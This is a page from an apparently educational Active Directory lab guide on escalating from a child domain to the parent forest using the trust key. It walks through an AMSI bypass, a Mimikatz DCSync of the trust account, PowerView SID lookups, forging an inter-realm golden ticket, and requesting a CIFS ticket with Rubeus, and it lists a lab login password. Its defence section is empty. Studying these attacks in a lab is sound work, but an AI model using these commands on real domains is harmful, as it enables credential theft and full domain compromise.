> For the complete documentation index, see [llms.txt](https://ad-lab.gitbook.io/building-a-windows-ad-lab/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ad-lab.gitbook.io/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/active-directory-attacks/hopping-domains-and-forests/child-to-parent-domain/page-3-1.md).

# Trust key

## Attacking

### How it works

Once you gain Domain Admin privileges within the child domain its possible to get Enterprise Admin in the parent domain by generating a golden ticket in the child domain with the SID of the Enterprise Admin group.

### Tools

* [MimiKatz](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1)
* [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)

### Executing the attack

The attack is executed from the perspective of already gaining domain admin privileges. This is done in the unconstrained delegation section:

{% content-ref url="/pages/mACzmdzGG8oWuvr3Qlrf" %}
[Unconstrained Delegation](/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/active-directory-attacks/delegation-attacks/unconstrained-delegation.md)
{% endcontent-ref %}

1. For easy execution, login on `WS01` as the `Administrator` user with the password `Welcome01!`.
2. Start PowerShell as Administrator and load a amsi bypass and MimiKatz into memory.

<div align="left"><img src="/files/sTINDTrfo680YwFzIXoc" alt=""></div>

3\. DCsync the trust key with MimiKatz:

```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:amsterdam\bank$"'
```

<div align="left"><img src="/files/4faBod1rtS5nd3b17cAO" alt=""></div>

4\. Retrieve the SID of the enterprise Admins group, using PowerView:

```
Get-DomainGroup "Enterprise Admins" -Domain bank.local | Select-Object samaccountname, objectsid
```

<div align="left"><img src="/files/xJZXUE0mdtJmzQe5b6UJ" alt=""></div>

5\. Retrieve the domain SID from the child domain, using PowerView:

```
Get-DomainSid
```

<div align="left"><img src="/files/nCkhRsYceOJshI5IRjK4" alt=""></div>

6\. Create a TGT for the krbtgt user and save it to disk with MimiKatz:

```
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:<FQDN CHILD DOMAIN> /sid:<SID CHILD DOMAIN> /sids:<SIDS OF ENTERPRISE ADMIN GROUP OF TARGET> /rc4:<TRUST KEY HASH> /service:krbtgt /target:<FQDN PARENT DOMAIN> /ticket:<PATH TO SAVE TICKET>"'
```

![](/files/sVe5zbioRGbT7MgnuFaq)

7\. Create a TGS for the CIFS service with Rubeus.exe using the created TGT:

```
.\Rubeus.exe asktgs /ticket:trustkey.kirbi /service:CIFS/dc01.bank.local /dc:dc01.bank.local /ptt
```

![](/files/KhxDmRlus8jMyKCWq01l)

List the tickets:

<div align="left"><img src="/files/6sqj5tSa0hwnogw6M9g6" alt=""></div>

## Defending

### Detection

## References
